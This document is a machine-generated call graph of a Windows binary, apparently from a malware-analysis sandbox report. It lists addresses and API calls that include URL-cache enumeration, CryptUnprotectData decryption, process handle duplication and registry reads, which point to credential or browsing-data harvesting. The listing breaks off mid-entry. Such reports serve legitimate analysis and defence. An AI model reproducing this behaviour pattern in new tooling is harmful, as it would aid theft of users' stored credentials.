38742->38743 38744 413da5 OpenProcess 38743->38744 38745 413f17 CloseHandle 38743->38745 38746 413df3 memset 38744->38746 38749 413eb0 38744->38749 38745->38485 39341 413f27 38746->39341 38748 413ebf free 38748->38749 38749->38743 38749->38748 38750 4099f4 3 API calls 38749->38750 38750->38749 38752 413e37 GetModuleHandleW 38754 413e1f 38752->38754 38755 413e46 38752->38755 38753 413e6a QueryFullProcessImageNameW 38753->38754 38754->38752 38754->38753 39346 413959 38754->39346 39362 413ca4 38754->39362 38755->38754 38757 413ea2 CloseHandle 38757->38749 38759 414c2e 16 API calls 38758->38759 38760 403eb7 38759->38760 38761 414c2e 16 API calls 38760->38761 38762 403ec5 38761->38762 38763 409d1f 6 API calls 38762->38763 38764 403ee2 38763->38764 38765 409d1f 6 API calls 38764->38765 38766 403efd 38765->38766 38767 409d1f 6 API calls 38766->38767 38768 403f15 38767->38768 38769 403af5 20 API calls 38768->38769 38770 403f29 38769->38770 38771 403af5 20 API calls 38770->38771 38772 403f3a 38771->38772 38773 40414f 33 API calls 38772->38773 38774 403f4f 38773->38774 38775 403faf 38774->38775 38777 403f5b memset 38774->38777 38779 4099c6 2 API calls 38774->38779 38780 40a8ab 9 API calls 38774->38780 39375 40b1ab free free 38775->39375 38777->38774 38778 403fb7 38778->38422 38779->38774 38780->38774 38782 414c2e 16 API calls 38781->38782 38783 403d26 38782->38783 38784 414c2e 16 API calls 38783->38784 38785 403d34 38784->38785 38786 409d1f 6 API calls 38785->38786 38787 403d51 38786->38787 38788 409d1f 6 API calls 38787->38788 38789 403d6c 38788->38789 38790 409d1f 6 API calls 38789->38790 38791 403d84 38790->38791 38792 403af5 20 API calls 38791->38792 38793 403d98 38792->38793 38794 403af5 20 API calls 38793->38794 38795 403da9 38794->38795 38796 40414f 33 API calls 38795->38796 38797 403dbe 38796->38797 38798 403e1e 38797->38798 38800 403dca memset 38797->38800 38802 4099c6 2 API calls 38797->38802 38803 40a8ab 9 API calls 38797->38803 39376 40b1ab free free 38798->39376 38800->38797 38801 403e26 38801->38440 38802->38797 38803->38797 38805 414b81 8 API calls 38804->38805 38806 414c40 38805->38806 38807 414c73 memset 38806->38807 39377 409cea 38806->39377 38808 414c94 38807->38808 39380 414592 RegOpenKeyExW 38808->39380 38812 414c64 SHGetSpecialFolderPathW 38813 414d0b 38812->38813 38813->38443 38814 414cc1 38815 414cf4 wcscpy 38814->38815 39381 414bb0 wcscpy 38814->39381 38815->38813 38817 414cd2 39382 4145ac RegQueryValueExW 38817->39382 38819 414ce9 RegCloseKey 38819->38815 38821 409d43 wcscpy 38820->38821 38823 409d62 38820->38823 38822 409719 2 API calls 38821->38822 38824 409d51 wcscat 38822->38824 38825 445389 38823->38825 38824->38823 38826 40ae18 9 API calls 38825->38826 38828 4453c4 38826->38828 38827 40ae51 9 API calls 38827->38828 38828->38827 38829 4453f3 38828->38829 38831 40add4 2 API calls 38828->38831 38833 445403 250 API calls 38828->38833 38830 40aebe FindClose 38829->38830 38832 4453fe 38830->38832 38831->38828 38832->38492 38833->38828 38834->38394 38835->38488 38836->38470 38837->38470 38838->38502 38840 409c89 38839->38840 38840->38524 38841->38555 38843 413d39 38842->38843 38844 413d2f FreeLibrary 38842->38844 38845 40b633 free 38843->38845 38844->38843 38846 413d42 38845->38846 38847 40b633 free 38846->38847 38848 413d4a 38847->38848 38848->38383 38849->38423 38850->38431 38851->38453 38853 44db70 38852->38853 38854 40b6fc memset 38853->38854 38855 409c70 2 API calls 38854->38855 38856 40b732 wcsrchr 38855->38856 38857 40b743 38856->38857 38858 40b746 memset 38856->38858 38857->38858 38859 40b2cc 27 API calls 38858->38859 38860 40b76f 38859->38860 38861 409d1f 6 API calls 38860->38861 38862 40b783 38861->38862 39383 409b98 GetFileAttributesW 38862->39383 38864 40b792 38865 409c70 2 API calls 38864->38865 38879 40b7c2 38864->38879 38868 40b7a5 38865->38868 38871 40b2cc 27 API calls 38868->38871 38869 40b837 CloseHandle 38873 40b83e memset 38869->38873 38870 40b817 39487 409a45 GetTempPathW 38870->39487 38874 40b7b2 38871->38874 39417 40a6e6 WideCharToMultiByte 38873->39417 38877 409d1f 6 API calls 38874->38877 38875 40b827 38875->38873 38877->38879 38878 40b866 39418 444432 38878->39418 39384 40bb98 38879->39384 38882 40bad5 38884 40b04b ??3@YAXPAX 38882->38884 38883 40b273 27 API calls 38885 40b89a 38883->38885 38886 40baf3 38884->38886 39464 438552 38885->39464 38886->38463 38889 40bacd 39467 443d90 38889->39467 38892 40bac6 39517 424f26 122 API calls 38892->39517 38893 40b8bd memset 39508 425413 17 API calls 38893->39508 38896 425413 17 API calls 38914 40b8b8 38896->38914 38899 40a71b MultiByteToWideChar 38899->38914 38900 40a734 MultiByteToWideChar 38900->38914 38903 40b9b5 memcmp 38903->38914 38904 4099c6 2 API calls 38904->38914 38905 404423 37 API calls 38905->38914 38908 4251c4 136 API calls 38908->38914 38909 40bb3e memset memcpy 39518 40a734 MultiByteToWideChar 38909->39518 38911 40bb88 LocalFree 38911->38914 38914->38892 38914->38893 38914->38896 38914->38899 38914->38900 38914->38903 38914->38904 38914->38905 38914->38908 38914->38909 38915 40ba5f memcmp 38914->38915 39509 4253ef 16 API calls 38914->39509 39510 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38914->39510 39511 4253af 17 API calls 38914->39511 39512 4253cf 17 API calls 38914->39512 39513 447280 memset 38914->39513 39514 447960 memset memcpy memcpy memcpy 38914->39514 39515 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38914->39515 39516 447920 memcpy memcpy memcpy 38914->39516 38915->38914 38916->38465 38918 40aebe FindClose 38917->38918 38919 40ae21 38918->38919 38920 4099c6 2 API calls 38919->38920 38921 40ae35 38920->38921 38922 409d1f 6 API calls 38921->38922 38923 40ae49 38922->38923 38923->38528 38925 40ade0 38924->38925 38926 40ae0f 38924->38926 38925->38926 38927 40ade7 wcscmp 38925->38927 38926->38528 38927->38926 38928 40adfe wcscmp 38927->38928 38928->38926 38930 40ae7b FindNextFileW 38929->38930 38931 40ae5c FindFirstFileW 38929->38931 38932 40ae94 38930->38932 38933 40ae8f 38930->38933 38931->38932 38935 40aeb6 38932->38935 38936 409d1f 6 API calls 38932->38936 38934 40aebe FindClose 38933->38934 38934->38932 38935->38528 38936->38935 38938 40aed1 38937->38938 38939 40aec7 FindClose 38937->38939 38938->38397 38939->38938 38941 4099d7 38940->38941 38942 4099da memcpy 38940->38942 38941->38942 38942->38449 38944 40b2cc 27 API calls 38943->38944 38945 44543f 38944->38945 38946 409d1f 6 API calls 38945->38946 38947 44544f 38946->38947 39901 409b98 GetFileAttributesW 38947->39901 38949 44545e 38950 445476 38949->38950 38951 40b6ef 249 API calls 38949->38951 38952 40b2cc 27 API calls 38950->38952 38951->38950 38953 445482 38952->38953 38954 409d1f 6 API calls 38953->38954 38955 445492 38954->38955 39902 409b98 GetFileAttributesW 38955->39902 38957 4454a1 38958 4454b9 38957->38958 38959 40b6ef 249 API calls 38957->38959 38958->38477 38959->38958 38960->38476 38961->38493 38962->38499 38963->38536 38964->38513 38965->38563 38966->38563 38967->38544 38968->38574 38969->38576 38970->38578 38972 414c2e 16 API calls 38971->38972 38973 40c2ae 38972->38973 39029 40c1d3 38973->39029 38978 40c3be 38995 40a8ab 38978->38995 38979 40afcf 2 API calls 38980 40c2fd FindFirstUrlCacheEntryW 38979->38980 38981 40c3b6 38980->38981 38982 40c31e wcschr 38980->38982 38983 40b04b ??3@YAXPAX 38981->38983 38984 40c331 38982->38984 38985 40c35e FindNextUrlCacheEntryW 38982->38985 38983->38978 38986 40a8ab 9 API calls 38984->38986 38985->38982 38987 40c373 GetLastError 38985->38987 38988 40c33e wcschr 38986->38988 38989 40c3ad FindCloseUrlCache 38987->38989 38990 40c37e 38987->38990 38988->38985 38991 40c34f 38988->38991 38989->38981 38992 40afcf 2 API calls 38990->38992 38994 40a8ab 9 API calls 38991->38994 38993 40c391 FindNextUrlCacheEntryW 38992->38993 38993->38982 38993->38989 38994->38985 39123 40a97a 38995->39123 38998 40a8cc 38998->38585 38999 40a8d0 7 API calls 38999->38998 39128 40b1ab free free 39000->39128 39002 40c3dd 39003 40b2cc 27 API calls 39002->39003 39004 40c3e7 39003->39004 39129 414592 RegOpenKeyExW 39004->39129 39006 40c3f4 39007 40c50e 39006->39007 39008 40c3ff 39006->39008 39022 405337 39007->39022 39009 40a9ce 4 API calls 39008->39009 39010 40c418 memset 39009->39010 39130 40aa1d 39010->39130 39013 40c471 39015 40c47a _wcsupr 39013->39015 39014 40c505 RegCloseKey 39014->39007 39016 40a8d0 7 API calls 39015->39016 39017 40c498 39016->39017 39018 40a8d0 7 API calls 39017->39018 39019 40c4ac memset 39018->39019 39020 40aa1d 39019->39020 39021 40c4e4 RegEnumValueW 39020->39021 39021->39014 39021->39015 39132 405220 39022->39132 39024 405340 39024->38599 39025->38596 39026->38598 39027->38599 39028->38592 39030 40ae18 9 API calls 39029->39030 39039 40c210 39030->39039 39031 40ae51 9 API calls 39031->39039 39032 40c264 39033 40aebe FindClose 39032->39033 39035 40c26f 39033->39035 39034 40add4 2 API calls 39034->39039 39041 40e5ed memset memset 39035->39041 39036 40c231 _wcsicmp 39038 40c248 39036->39038 39036->39039 39037 40c1d3 34 API calls 39037->39039 39054 40c084 21 API calls 39038->39054 39039->39031 39039->39032 39039->39034 39039->39036 39039->39037 39042 414c2e 16 API calls 39041->39042 39043 40e63f 39042->39043 39044 409d1f 6 API calls 39043->39044 39045 40e658 39044->39045 39055 409b98 GetFileAttributesW 39045->39055 39047 40e667 39048 40e680 39047->39048 39049 409d1f 6 API calls 39047->39049 39056 409b98 GetFileAttributesW 39048->39056 39049->39048 39051 40e68f 39052 40c2d8 39051->39052 39057 40e4b2 39051->39057 39052->38978 39052->38979 39054->39039 39055->39047 39056->39051 39078 40e01e 39057->39078 39059 40e593 39060 40e5b0 39059->39060 39061 40e59c DeleteFileW 39059->39061 39062 40b04b ??3@YAXPAX 39060->39062 39061->39060 39064 40e5bb 39062->39064 39063 40e521 39063->39059 39101 40e175 39063->39101 39066 40e5c4 CloseHandle 39064->39066 39067 40e5cc 39064->39067 39066->39067 39069 40b633 free 39067->39069 39068 40e573 39070 40e584 39068->39070 39071 40e57c CloseHandle 39068->39071 39072 40e5db 39069->39072 39122 40b1ab free free 39070->39122 39071->39070 39075 40b633 free 39072->39075 39074 40e540 39074->39068 39121 40e2ab 30 API calls 39074->39121 39076 40e5e3 39075->39076 39076->39052 39079 406214 22 API calls 39078->39079 39080 40e03c 39079->39080 39081 40e16b 39080->39081 39082 40dd85 60 API calls 39080->39082 39081->39063 39083 40e06b 39082->39083 39083->39081 39084 40afcf ??2@YAPAXI ??3@YAXPAX 39083->39084 39085 40e08d OpenProcess 39084->39085 39086 40e152 39085->39086 39087 40e0a4 GetCurrentProcess DuplicateHandle 39085->39087 39090 406214 22 API calls 39086->39090 39094 40e160 39086->39094 39088 40e0d0 GetFileSize 39087->39088 39089 40e14a CloseHandle 39087->39089 39092 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39088->39092 39089->39086 39090->39094 39091 40b04b ??3@YAXPAX 39091->39081 39093 40e0ea 39092->39093 39095 4096dc CreateFileW 39093->39095 39094->39091 39096 40e0f1 CreateFileMappingW 39095->39096 39097 40e140 CloseHandle CloseHandle 39096->39097 39098 40e10b MapViewOfFile 39096->39098 39097->39089 39099 40e13b CloseHandle 39098->39099 39100 40e11f WriteFile UnmapViewOfFile 39098->39100 39099->39097 39100->39099 39102 40e18c 39101->39102 39103 406b90 11 API calls 39102->39103 39104 40e19f 39103->39104 39105 40e1a7 memset 39104->39105 39106 40e299 39104->39106 39111 40e1e8 39105->39111 39107 4069a3 ??3@YAXPAX free 39106->39107 39108 40e2a4 39107->39108 39108->39074 39109 406e8f 13 API calls 39109->39111 39110 406b53 SetFilePointerEx ReadFile 39110->39111 39111->39109 39111->39110 39112 40e283 39111->39112 39113 40dd50 _wcsicmp 39111->39113 39117 40742e 8 API calls 39111->39117 39118 40aae3 wcslen wcslen _memicmp 39111->39118 39119 40e244 _snwprintf 39111->39119 39114 40e291 39112->39114 39115 40e288 free 39112->39115 39113->39111 39116 40aa04 free 39114->39116 39115->39114 39116->39106 39117->39111 39118->39111 39120 40a8d0 7 API calls 39119->39120 39120->39111 39121->39074 39122->39059 39127 40a980 39123->39127 39124 40a8bb 39124->38998 39124->38999 39125 40a995 _wcsicmp 39125->39127 39126 40a99c wcscmp 39126->39127 39127->39124 39127->39125 39127->39126 39128->39002 39129->39006 39131 40aa23 RegEnumValueW 39130->39131 39131->39013 39131->39014 39133 40522a 39132->39133 39158 405329 39132->39158 39134 40b2cc 27 API calls 39133->39134 39135 405234 39134->39135 39136 40a804 8 API calls 39135->39136 39137 40523a 39136->39137 39159 40b273 39137->39159 39139 405248 _mbscpy _mbscat 39140 40526c 39139->39140 39141 40b273 27 API calls 39140->39141 39142 405279 39141->39142 39143 40b273 27 API calls 39142->39143 39144 40528f 39143->39144 39145 40b273 27 API calls 39144->39145 39146 4052a5 39145->39146 39147 40b273 27 API calls 39146->39147 39148 4052bb 39147->39148 39149 40b273 27 API calls 39148->39149 39150 4052d1 39149->39150 39151 40b273 27 API calls 39150->39151 39152 4052e7 39151->39152 39153 40b273 27 API calls 39152->39153 39154 4052fd 39153->39154 39155 40b273 27 API calls 39154->39155 39156 405313 39155->39156 39157 40b273 27 API calls 39156->39157 39157->39158 39158->39024 39160 40b58d 27 API calls 39159->39160 39161 40b18c 39160->39161 39161->39139 39163 40440c FreeLibrary 39162->39163 39164 40436d 39163->39164 39165 40a804 8 API calls 39164->39165 39166 404377 39165->39166 39167 4043f7 39166->39167 39168 40b273 27 API calls 39166->39168 39167->38606 39167->38608 39169 40438d 39168->39169 39170 40b273 27 API calls 39169->39170 39171 4043a7 39170->39171 39172 40b273 27 API calls 39171->39172 39173 4043ba 39172->39173 39174 40b273 27 API calls 39173->39174 39175 4043ce 39174->39175 39176 40b273 27 API calls 39175->39176 39177 4043e2 39176->39177 39177->39167 39178 40440c FreeLibrary 39177->39178 39178->39167 39180 404413 FreeLibrary 39179->39180 39181 40441e 39179->39181 39180->39181 39181->38619 39182->38616 39184 40447e 39183->39184 39185 40442e 39183->39185 39186 404485 CryptUnprotectData 39184->39186 39187 40449c 39184->39187 39188 40b2cc 27 API calls 39185->39188 39186->39187 39187->38616 39189 404438 39188->39189 39190 40a804 8 API calls 39189->39190 39191 40443e 39190->39191 39192 40444f 39191->39192 39193 40b273 27 API calls 39191->39193 39192->39184 39194 404475 FreeLibrary 39192->39194 39193->39192 39194->39184 39196 4135f6 39195->39196 39197 4135eb FreeLibrary 39195->39197 39196->38622 39197->39196 39199 4449c4 39198->39199 39217 444a48 39198->39217 39200 40b2cc 27 API calls 39199->39200 39201 4449cb 39200->39201 39202 40a804 8 API calls 39201->39202 39203 4449d1 39202->39203 39204 40b273 27 API calls 39203->39204 39205 4449dc 39204->39205 39206 40b273 27 API calls 39205->39206 39207 4449f3 39206->39207 39208 40b273 27 API calls 39207->39208 39209 444a04 39208->39209 39210 40b273 27 API calls 39209->39210 39211 444a15 39210->39211 39212 40b273 27 API calls 39211->39212 39217->38642 39217->38643 39218->38653 39219->38653 39220->38653 39221->38653 39222->38644 39224 403a29 39223->39224 39238 403bed memset memset 39224->39238 39226 403ae7 39251 40b1ab free free 39226->39251 39227 403a3f memset 39232 403a2f 39227->39232 39229 403aef 39229->38660 39230 409d1f 6 API calls 39230->39232 39231 409b98 GetFileAttributesW 39231->39232 39232->39226 39232->39227 39232->39230 39232->39231 39233 40a8d0 7 API calls 39232->39233 39233->39232 39235 40a051 GetFileTime CloseHandle 39234->39235 39236 4039ca CompareFileTime 39234->39236 39235->39236 39236->38660 39237->38661 39239 414c2e 16 API calls 39238->39239 39240 403c38 39239->39240 39241 409719 2 API calls 39240->39241 39242 403c3f wcscat 39241->39242 39243 414c2e 16 API calls 39242->39243 39244 403c61 39243->39244 39245 409719 2 API calls 39244->39245 39246 403c68 wcscat 39245->39246 39252 403af5 39246->39252 39249 403af5 20 API calls 39250 403c95 39249->39250 39250->39232 39251->39229 39253 403b02 39252->39253 39254 40ae18 9 API calls 39253->39254 39262 403b37 39254->39262 39255 403bdb 39257 40aebe FindClose 39255->39257 39256 40add4 wcscmp wcscmp 39256->39262 39258 403be6 39257->39258 39258->39249 39259 40ae18 9 API calls 39259->39262 39260 40ae51 9 API calls 39260->39262 39261 40aebe FindClose 39261->39262 39262->39255 39262->39256 39262->39259 39262->39260 39262->39261 39263 40a8d0 7 API calls 39262->39263 39263->39262 39265 409d1f 6 API calls 39264->39265 39266 404190 39265->39266 39279 409b98 GetFileAttributesW 39266->39279 39268 40419c 39269 4041a7 6 API calls 39268->39269 39270 40435c 39268->39270 39272 40424f 39269->39272 39270->38682 39272->39270 39273 40425e memset 39272->39273 39275 409d1f 6 API calls 39272->39275 39276 40a8ab 9 API calls 39272->39276 39280 414842 39272->39280 39273->39272 39274 404296 wcscpy 39273->39274 39274->39272 39275->39272 39277 4042b6 memset memset _snwprintf wcscpy 39276->39277 39277->39272 39278->38686 39279->39268 39283 41443e 39280->39283 39282 414866 39282->39272 39284 41444b 39283->39284 39285 414451 39284->39285 39286 4144a3 GetPrivateProfileStringW 39284->39286 39287 414491 39285->39287 39288 414455 wcschr 39285->39288 39286->39282 39290 414495 WritePrivateProfileStringW 39287->39290 39288->39287 39289 414463 _snwprintf 39288->39289 39289->39290 39290->39282 39291->38691 39293 40b2cc 27 API calls 39292->39293 39294 409615 39293->39294 39295 409d1f 6 API calls 39294->39295 39296 409625 39295->39296 39319 409b98 GetFileAttributesW 39296->39319 39298 409634 39299 409648 39298->39299 39336 4091b8 238 API calls 39298->39336 39300 40b2cc 27 API calls 39299->39300 39305 408801 39299->39305 39302 40965d 39300->39302 39303 409d1f 6 API calls 39302->39303 39304 40966d 39303->39304 39320 409b98 GetFileAttributesW 39304->39320 39305->38694 39305->38738 39307 40967c 39307->39305 39321 409529 39307->39321 39319->39298 39320->39307 39337 4096c3 CreateFileW 39321->39337 39323 409543 39324 4095cd 39323->39324 39325 409550 GetFileSize 39323->39325 39324->39305 39326 409577 CloseHandle 39325->39326 39327 40955f 39325->39327 39326->39324 39332 409585 39326->39332 39328 40afcf 2 API calls 39327->39328 39329 409569 39328->39329 39338 40a2ef ReadFile 39329->39338 39331 409574 39331->39326 39332->39324 39333 4095c3 39332->39333 39339 408b8d 38 API calls 39332->39339 39340 40908b 55 API calls 39333->39340 39336->39299 39337->39323 39338->39331 39339->39332 39340->39324 39368 413f4f 39341->39368 39344 413f37 K32GetModuleFileNameExW 39345 413f4a 39344->39345 39345->38754 39347 413969 wcscpy 39346->39347 39348 41396c wcschr 39346->39348 39360 413a3a 39347->39360 39348->39347 39350 41398e 39348->39350 39372 4097f7 wcslen wcslen _memicmp 39350->39372 39352 41399a 39353 4139a4 memset 39352->39353 39354 4139e6 39352->39354 39373 409dd5 GetWindowsDirectoryW wcscpy 39353->39373 39356 413a31 wcscpy 39354->39356 39357 4139ec memset 39354->39357 39356->39360 39374 409dd5 GetWindowsDirectoryW wcscpy 39357->39374 39358 4139c9 wcscpy wcscat 39358->39360 39360->38754 39361 413a11 memcpy wcscat 39361->39360 39363 413cb0 GetModuleHandleW 39362->39363 39364 413cda 39362->39364 39363->39364 39365 413cbf 39363->39365 39366 413ce3 GetProcessTimes 39364->39366 39367 413cf6 39364->39367 39365->39364 39366->38757 39367->38757 39369 413f2f 39368->39369 39370 413f54 39368->39370 39369->39344 39369->39345 39371 40a804 8 API calls 39370->39371 39371->39369 39372->39352 39373->39358 39374->39361 39375->38778 39376->38801 39378 409cf9 GetVersionExW 39377->39378 39379 409d0a 39377->39379 39378->39379 39379->38807 39379->38812 39380->38814 39381->38817 39382->38819 39383->38864 39385 40bba5 39384->39385 39519 40cc26 39385->39519 39388 40bd4b 39540 40cc0c 39388->39540 39393 40b2cc 27 API calls 39394 40bbef 39393->39394 39547 40ccf0 _wcsicmp 39394->39547 39396 40bbf5 39396->39388 39548 40ccb4 6 API calls 39396->39548 39398 40bc26 39399 40cf04 17 API calls 39398->39399 39400 40bc2e 39399->39400 39401 40bd43 39400->39401 39402 40b2cc 27 API calls 39400->39402 39403 40cc0c 4 API calls 39401->39403 39404 40bc40 39402->39404 39403->39388 39549 40ccf0 _wcsicmp 39404->39549 39406 40bc46 39406->39401 39407 40bc61 memset memset WideCharToMultiByte 39406->39407 39550 40103c strlen 39407->39550 39409 40bcc0 39410 40b273 27 API calls 39409->39410 39411 40bcd0 memcmp 39410->39411 39411->39401 39412 40bce2 39411->39412 39413 404423 37 API calls 39412->39413 39414 40bd10 39413->39414 39414->39401 39415 40bd3a LocalFree 39414->39415 39416 40bd1f memcpy 39414->39416 39415->39401 39416->39415 39417->38878 39610 4438b5 39418->39610 39420 44444c 39421 40b879 39420->39421 39624 415a6d 39420->39624 39421->38882 39421->38883 39423 4442e6 11 API calls 39425 44469e 39423->39425 39424 444486 39426 4444b9 memcpy 39424->39426 39463 4444a4 39424->39463 39425->39421 39428 443d90 110 API calls 39425->39428 39628 415258 39426->39628 39428->39421 39429 444524 39430 444541 39429->39430 39431 44452a 39429->39431 39631 444316 39430->39631 39432 416935 16 API calls 39431->39432 39432->39463 39435 444316 18 API calls 39436 444563 39435->39436 39437 444316 18 API calls 39436->39437 39438 44456f 39437->39438 39439 444316 18 API calls 39438->39439 39440 44457f 39439->39440 39440->39463 39645 432d4e 39440->39645 39443 444316 18 API calls 39444 4445b0 39443->39444 39649 41eed2 39444->39649 39446 4445cf 39447 4445d6 39446->39447 39448 4445ee 39446->39448 39450 416935 16 API calls 39447->39450 39665 43302c 39448->39665 39450->39463 39452 43302c memset 39453 444609 39452->39453 39453->39463 39671 416935 39453->39671 39455 444646 39679 434d4b 39455->39679 39463->39423 39743 438460 39464->39743 39466 40b8a4 39466->38889 39490 4251c4 39466->39490 39468 443da3 39467->39468 39486 443db6 39467->39486 39831 41707a 11 API calls 39468->39831 39470 443da8 39471 443dbc 39470->39471 39472 443dac 39470->39472 39833 4300e8 memset memset memcpy 39471->39833 39832 4446ea 11 API calls 39472->39832 39475 443de0 39476 416935 16 API calls 39475->39476 39476->39486 39477 443dce 39477->39475 39481 443e22 39477->39481 39478 443e5a 39835 4300e8 memset memset memcpy 39478->39835 39481->39478 39834 41f0ac 102 API calls 39481->39834 39482 443e63 39483 416935 16 API calls 39482->39483 39484 443f3b 39483->39484 39484->39486 39836 42320f memset memcpy 39484->39836 39486->38882 39488 409a74 GetTempFileNameW 39487->39488 39489 409a66 GetWindowsDirectoryW 39487->39489 39488->38875 39489->39488 39837 424f07 11 API calls 39490->39837 39492 4251e4 39493 4251f7 39492->39493 39494 4251e8 39492->39494 39839 4250f8 39493->39839 39838 4446ea 11 API calls 39494->39838 39497 425209 39498 425249 39497->39498 39504 4250f8 126 API calls 39497->39504 39505 425287 39497->39505 39847 4384e9 134 API calls 39497->39847 39848 424f74 123 API calls 39497->39848 39498->39505 39849 424ff0 13 API calls 39498->39849 39499 415c7d 16 API calls 39501 4251f2 39499->39501 39501->38914 39504->39497 39505->39499 39506 425266 39506->39505 39850 415be9 memcpy 39506->39850 39508->38914 39509->38914 39510->38914 39511->38914 39512->38914 39513->38914 39514->38914 39515->38914 39516->38914 39517->38889 39518->38911 39551 4096c3 CreateFileW 39519->39551 39521 40cc34 39522 40cc3d GetFileSize 39521->39522 39523 40bbca 39521->39523 39524 40afcf 2 API calls 39522->39524 39523->39388 39531 40cf04 39523->39531 39525 40cc64 39524->39525 39552 40a2ef ReadFile 39525->39552 39527 40cc71 39553 40ab4a MultiByteToWideChar 39527->39553 39529 40cc95 CloseHandle 39530 40b04b ??3@YAXPAX 39529->39530 39530->39523 39532 40b633 free 39531->39532 39533 40cf14 39532->39533 39559 40b1ab free free 39533->39559 39535 40cf1b 39536 40bbdd 39535->39536 39538 40cfef 39535->39538 39560 40cd4b 39535->39560 39536->39388 39536->39393 39539 40cd4b 14 API calls 39538->39539 39539->39536 39541 40b633 free 39540->39541 39542 40cc15 39541->39542 39543 40aa04 free 39542->39543 39544 40cc1d 39543->39544 39609 40b1ab free free 39544->39609 39546 40b7d4 memset CreateFileW 39546->38869 39546->38870 39547->39396 39548->39398 39549->39406 39550->39409 39551->39521 39552->39527 39554 40ab6b 39553->39554 39558 40ab93 39553->39558 39555 40a9ce 4 API calls 39554->39555 39556 40ab74 39555->39556 39557 40ab7c MultiByteToWideChar 39556->39557 39557->39558 39558->39529 39559->39535 39561 40cd7b 39560->39561 39594 40aa29 39561->39594 39563 40cef5 39564 40aa04 free 39563->39564 39565 40cefd 39564->39565 39565->39535 39567 40aa29 6 API calls 39568 40ce1d 39567->39568 39569 40aa29 6 API calls 39568->39569 39570 40ce3e 39569->39570 39571 40ce6a 39570->39571 39602 40abb7 wcslen memmove 39570->39602 39572 40ce9f 39571->39572 39605 40abb7 wcslen memmove 39571->39605 39574 40a8d0 7 API calls 39572->39574 39577 40ceb5 39574->39577 39575 40ce56 39603 40aa71 wcslen 39575->39603 39584 40a8d0 7 API calls 39577->39584 39579 40ce8b 39606 40aa71 wcslen 39579->39606 39581 40ce5e 39604 40abb7 wcslen memmove 39581->39604 39582 40ce93 39607 40abb7 wcslen memmove 39582->39607 39586 40cecb 39584->39586 39608 40d00b malloc memcpy free free 39586->39608 39588 40cedd 39589 40aa04 free 39588->39589 39590 40cee5 39589->39590 39591 40aa04 free 39590->39591 39592 40ceed 39591->39592 39593 40aa04 free 39592->39593 39593->39563 39595 40aa33 39594->39595 39601 40aa63 39594->39601 39596 40aa44 39595->39596 39597 40aa38 wcslen 39595->39597 39598 40a9ce malloc memcpy free free 39596->39598 39597->39596 39599 40aa4d 39598->39599 39600 40aa51 memcpy 39599->39600 39599->39601 39600->39601 39601->39563 39601->39567 39602->39575 39603->39581 39604->39571 39605->39579 39606->39582 39607->39572 39608->39588 39609->39546 39611 4438d0 39610->39611 39620 4438c9 39610->39620 39698 415378 memcpy memcpy 39611->39698 39620->39420 39625 415a77 39624->39625 39626 415a8d 39625->39626 39627 415a7e memset 39625->39627 39626->39424 39627->39626 39629 4438b5 11 API calls 39628->39629 39630 41525d 39629->39630 39630->39429 39632 444328 39631->39632 39633 444423 39632->39633 39634 44434e 39632->39634 39699 4446ea 11 API calls 39633->39699 39636 432d4e 3 API calls 39634->39636 39637 44435a 39636->39637 39639 444375 39637->39639 39644 44438b 39637->39644 39638 432d4e 3 API calls 39640 4443ec 39638->39640 39641 416935 16 API calls 39639->39641 39642 444381 39640->39642 39643 416935 16 API calls 39640->39643 39641->39642 39642->39435 39643->39642 39644->39638 39646 432d58 39645->39646 39648 432d65 39645->39648 39700 432cc4 memset memset memcpy 39646->39700 39648->39443 39650 41eee2 39649->39650 39651 415a6d memset 39650->39651 39652 41ef23 39651->39652 39653 415a6d memset 39652->39653 39664 41ef2d 39652->39664 39654 41ef42 39653->39654 39658 41ef49 39654->39658 39701 41b7d9 39654->39701 39656 41ef66 39657 41ef74 memset 39656->39657 39656->39658 39659 41ef91 39657->39659 39662 41ef9e 39657->39662 39658->39664 39716 41b321 100 API calls 39658->39716 39661 41519d 6 API calls 39659->39661 39661->39662 39662->39658 39715 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39662->39715 39664->39446 39666 433033 39665->39666 39667 433042 39665->39667 39722 421f20 memset 39666->39722 39723 415a91 39667->39723 39670 43303f 39670->39452 39672 41693e 39671->39672 39676 41698e 39671->39676 39673 41694c 39672->39673 39727 422fd1 memset 39672->39727 39673->39676 39728 4165a0 11 API calls 39673->39728 39676->39455 39677 416972 39677->39676 39729 422b84 15 API calls 39677->39729 39680 434d5c 39679->39680 39730 432e5a 39680->39730 39699->39642 39700->39648 39707 41b812 39701->39707 39702 415a6d memset 39703 41b8c2 39702->39703 39704 41b980 39703->39704 39705 41b902 memcpy memcpy memcpy memcpy memcpy 39703->39705 39711 41b849 39703->39711 39712 41b9ad 39704->39712 39718 4151e3 39704->39718 39705->39704 39707->39711 39714 41b884 39707->39714 39717 444706 11 API calls 39707->39717 39709 41ba12 39710 41ba32 memset 39709->39710 39709->39711 39710->39711 39711->39656 39712->39711 39721 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39712->39721 39714->39702 39714->39711 39715->39658 39716->39664 39717->39714 39720 41837f 54 API calls 39718->39720 39719 4151f9 39719->39712 39720->39719 39721->39709 39722->39670 39724 415a9d 39723->39724 39725 415ab3 39724->39725 39726 415aa4 memset 39724->39726 39725->39670 39726->39725 39727->39673 39728->39677 39729->39676 39731 432e98 39730->39731 39755 41703f 39743->39755 39745 43847a 39746 43848a 39745->39746 39747 43847e 39745->39747 39762 438270 39746->39762 39792 4446ea 11 API calls 39747->39792 39751 438488 39751->39466 39753 4384bb 39754 438270 133 API calls 39753->39754 39754->39751 39756 417044 39755->39756 39757 41705c 39755->39757 39761 417055 39756->39761 39794 416760 11 API calls 39756->39794 39758 417075 39757->39758 39795 41707a 11 API calls 39757->39795 39758->39745 39761->39745 39763 415a91 memset 39762->39763 39764 43828d 39763->39764 39765 438297 39764->39765 39766 438341 39764->39766 39768 4382d6 39764->39768 39767 415c7d 16 API calls 39765->39767 39796 44358f 39766->39796 39770 438458 39767->39770 39771 4382fb 39768->39771 39772 4382db 39768->39772 39770->39751 39793 424f26 122 API calls 39770->39793 39827 415c23 memcpy 39771->39827 39774 416935 16 API calls 39772->39774 39776 4382e9 39774->39776 39775 438305 39779 44358f 19 API calls 39775->39779 39781 438318 39775->39781 39777 415c7d 16 API calls 39776->39777 39777->39765 39778 438373 39784 438383 